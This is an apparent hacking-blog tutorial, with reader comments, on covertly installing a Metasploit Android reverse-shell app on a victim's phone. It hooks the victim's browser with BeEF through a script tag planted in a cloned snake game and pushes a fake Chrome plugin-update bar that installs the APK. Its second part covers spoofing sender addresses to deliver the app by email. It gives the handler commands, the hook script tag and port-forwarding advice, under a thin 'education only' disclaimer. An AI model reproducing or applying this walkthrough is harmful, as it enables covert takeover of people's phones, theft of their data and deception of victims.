As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.
I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.
If you have any problem, suggestion let me know by comments I help everyone.
Note: This is for education purpose only. Please don’t misuse it.
Requirements
- beef
- metasploit
- Patience (most of the readers don’t have patience )
Practical
We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.
After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands
service postresql start;msfconsole
It will launch Metasploit. Further commands
use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <local IP address>; set lport 4444
Remain this terminal as and follow further steps.
Launch beef. In Kali, you can start from the sidebar. In parrot or any other security distribution, you can launch using this command.
beef-xss
Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.
As you can see in the screenshot, it asks for the username and password. These are default username and password.
beef
beef
After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.
Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.
To hook own browser visit this link http://127.0.0.1:3000/demos/basic.html or insert script tag. When you open this beef will show something like this.
Meaning you hooked your browser (127.0.0.1 mean your browser). Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.
Open a new terminal and type ifconfig to find your IP address.
In my case, it is 192.168.43.7.
To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.
Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.
In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.
Just run this command.
service apache2 start
After this copy your android virus that you generated in the first step to /var/www/ directory. So URL of the Android virus is http://<IP>/appname.apk
I think you know how to find local IP address. Paste in URL tab of beef and click on execute.
On executing your android phone will show you something like this.
If you choose Install Missing Plugins, then the app will start downloading.
Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing).
But we will get a meterpreter session.
I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.
How to perform a real task
In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.
I found a snake script. It is the game developed using JavaScript you can download it from GitHub.
Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.
Here are simple steps to do this.
First of clone this game from Github.
git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano /var/www/html/Snake-game/snakegame.html
If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.
It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.
<script src="http://192.168.43.60:3000/hook.js"></script>
Press ctrl+o to save ctrl+x to exit.
Now, send URL http://192.168.43.60/Snake-game/snakegame.html to your victim. You can port forward your router to perform it over the internet.
Now when our victim opens the link, he will see something like this.
And we will get hook that browser. After that repeat above steps to install apps
Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.
Part-2 Email spoofing
As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.
Don’t confuse by above words there are tools and websites.
I use https://emkei.cz/ For sending spoofing emails.
This website has a straightforward interface. Just enter to, from, subject, message and send the message.
But Gmail service will catch it and move emails to spam.
In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.
Here is the screenshot of mail I send to my webmail using this website.
Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.
Problem with this method is who used webmail on the android phone, or my victim is using Gmail.
Well, this is part of social engineering. You should find your way to hack your victim phone. Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.
I was unable to create the Trojan virus it keep giving me result as an error “RangeErro” which I will later see the Trojan virus been creates on my root with 0byte contained file.
What exactly software you using to create a trojan virus
Is it possible to have an internet network available on PC when trying to create the Trojan virus or throughout the hacking process ?
Yes, you need an internet connection
Give me practically video sir
youtube will ban it
hi there . i have done all of steps sequently. step by step. but when victim tap to links , just i have core commands!!! I have no any commands else! i Have tried very much but it does not work never. please help me i have used VMware® Workstation 14 Pro. kali linux 2019 amd 64 bit
please help
what does not work
how can i do all this wind ubuntu
You need to install beef framework search on the google beef for ubuntu
How can you do this with an iPhone and another iPhone !
Actually I don’t have any iPhone so I don’t know
I wanna try this! im gonna fail miserably but i won’t give up, i just got a few questions….
Does the BeEEF and metasploit method works if the person lives overseas?
like if they click the link, would it work? or does the person needs to be on the same LAN as u?
It depends if you port forward then it will work over the internet otherwise you can victim should be on same network
I want Tution class from u sir is it possible
I’m busy
Thanks you
Nice article. This seems to a case when systems are in the same network. Can we using Beef / Rat compromise any unknown device which is not using the same wifi network. I mean in a say 4G network?
yeah by forwarding your router
Hi,
My name is Sony.
Nice knowing you Harinderpreet singh.
Then, Thankyou Bro, you are very inspiring me!
I am a beginner. Your site is very usefull for me.
Very awesome!
Keep working my Bro..
Regards,
Thanks brother for this hacking tips.
Thank you Harinderpreet ji use full article
Thankyou Harinderpreet for this informative article. I learnt a lot here and got exact information which I want.
great post sandy
thanks manish